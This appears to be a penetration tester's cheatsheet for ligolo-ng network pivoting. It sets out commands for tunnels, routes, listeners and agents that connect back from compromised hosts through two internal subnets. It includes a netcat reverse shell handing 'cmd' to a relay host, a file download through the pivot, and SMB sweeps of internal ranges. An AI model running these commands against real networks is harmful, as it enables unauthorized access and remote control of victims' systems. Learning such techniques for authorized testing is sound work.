ligolo-ng - wook413

https://ph03n1x.net/ligolo-cheatsheet/ # Local Port Forwarding to your Kali When you find a website that's accessible only from the target or a service that runs only on the target machine, then you need to perform local port forwarding. You don't need `proxychains` ```bash # On your Kali terminal, create a new network called 'ligolo' # It requires sudo rights sudo ip tuntap add user <user> mode tun ligolo sudo ip link set ligolo up # when you need to delete it sudo ip link del ligolo # Run proxy in your kali .\proxy -selfcert # connect agent to your proxy .\agent.exe -connect $ip:port -ignore-cert # select an agent session in proxy UI session # in proxy, select the new connection and attach it to ligolo start --tun ligolo # Add the magic route to access all internal ports locally on kali sudo ip route add 240.0.0.1/32 dev ligolo ``` # Set up with your config ```bash # tun0 I (Kali VPN) 192.168.1.10 # 1st machine external IP 192.168.1.13 # 1st machine internal IP 10.10.10.10 # 2nd machine external IP 10.10.10.13 # 2nd machine internal IP 11.11.11.11 ``` # 1st pivot on 1st internal range ```bash # 1. Create and bring up tunnel1 (Kali Terminal) sudo ip tuntap add user root mode tun ligolo sudo ip link set ligolo up # 2. Start ligolo proxy server on kali with sudo sudo ./proxy -selfcert # 3. Upload agent and connect back to proxy .\agent.exe -connect 192.168.45.176:11601 -ignore-cert # windows ./agent -connect 192.168.45.176:11601 -ignore-cert # linux # in proxy, select agent session session # 4. Start the tunnel start --tun ligolo # or just simply start # 5. Add route to the target subnet sudo ip route add 10.10.10.0/24 dev ligolo # 6. listener on tunnel1 listener_add --addr 0.0.0.0:11601 --to 127.0.0.1:11601 --tcp # 7. Test reachabaility nxc smb 10.10.10.0/24 ``` # 2nd pivot on 2nd internal range ```bash # 1. Create and bring up tunnel2 (Kali Terminal) sudo ip tuntap add user <user> mode tun tunnel2 sudo ip link set tunnel2 up # 2. Connect new agent (from 2nd target) to 1st target internal IP .\agent.exe -connect 10.10.10.10:11601 -ignore-cert # 3. select new agent session in proxy # make sure you are on the right connection start --tun tunnel2 # 4. Add route to 2nd internal subnet sudo ip route add 11.11.11.0/24 dev tunnel2 # 5. Add listeners for whitelisted ports listener_add --addr 0.0.0.0:443 --to 127.0.0.1:443 --tcp listener_add --addr 0.0.0.0:80 --to 127.0.0.1:80 --tcp # 6. Download from 2nd target using 1st internal wget http://10.10.10.10/wook -outfile wook # 7. Catch reverse shell from 2nd target on your kali IP nc64.exe 10.10.10.10 443 -e cmd # 8. Test reachability on 2nd subnet nxc smb 11.11.11.0/24 ```